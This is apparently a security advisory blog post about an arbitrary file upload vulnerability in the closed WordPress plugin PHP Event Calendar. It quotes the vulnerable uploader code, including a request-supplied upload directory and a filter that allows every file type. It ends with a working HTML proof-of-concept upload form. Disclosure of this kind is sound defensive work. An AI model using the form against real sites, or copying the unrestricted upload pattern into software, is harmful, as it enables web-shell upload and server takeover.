A day ago we had what looks to be a request from a hacker for a file that would be located at /wp-content/plugins/php-event-calendar/server/file-uploader/index.php. That would be a file in the plugin PHP Event Calendar. In the Plugin Directory the plugin “has been closed and is no longer available for download”, but no reason is given as to why that is.
In looking around we couldn’t find any public disclosure of a security issue related to that file.
Looking at the code in that file, /server/file-uploader/index.php, in the most recent version of the plugin it simple sets up an instance of the jQuery File Upload Plugin PHP Class library located in the file /server/file-uploader/UploadHandler.php:
13 14 15 16 17
error_reporting(E_ALL | E_STRICT); require('UploadHandler.php'); $custom_dir = $_REQUEST['custom_dir']; $upload_handler = new UploadHandler(array('upload_dir' => $custom_dir));
In the UploadHandler.php file there is no restriction placed on what type of files can be uploaded through it:
'accept_file_types' => '/.+$/i',
So any type of file can be uploaded through it, leading to an arbitrary file upload vulnerability.
Because WordPress continues to refuse to properly handle closed plugins like this, we have no idea if they have known about vulnerability and didn’t warn people about it or if the plugin was closed for some other reason.
Since this vulnerability is being exploited, we are adding the vulnerability to the free data that comes with our service’s companion plugin, so even those not yet using our service can be warned if they are using a vulnerable version of the plugin.
Worth noting here is that this vulnerability was introduced as a security fix, as the relevant changelog entry when it was added was:
Important security fix. Replace Uploadify with jQuery File Upload
As far as we can tell what they replaced was actually more secure and had been inaccurately labeled as leading to an arbitrary file upload vulnerability (as the types of files that could be uploaded were limited).
That change seems like a good example of where our idea of providing an ability for plugin developers to submit information to WordPress on security fixes and then allowing others to review the changes could help to improve security. In the meantime we continue to offer free help to developers dealing with security vulnerabilities (that is an offer that hasn’t been taken up outside of developers we have contacted to let them know of vulnerabilities we or others have discovered).
Proof of Concept
The following proof of concept will upload the selected file to the directory /wp-content/plugins/php-event-calendar/server/file-uploader/.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-content/plugins/php-event-calendar/server/file-uploader/" method="POST" enctype="multipart/form-data"> <input type="file" name="files" /> <input type="submit" value="Submit" /> </form> </body>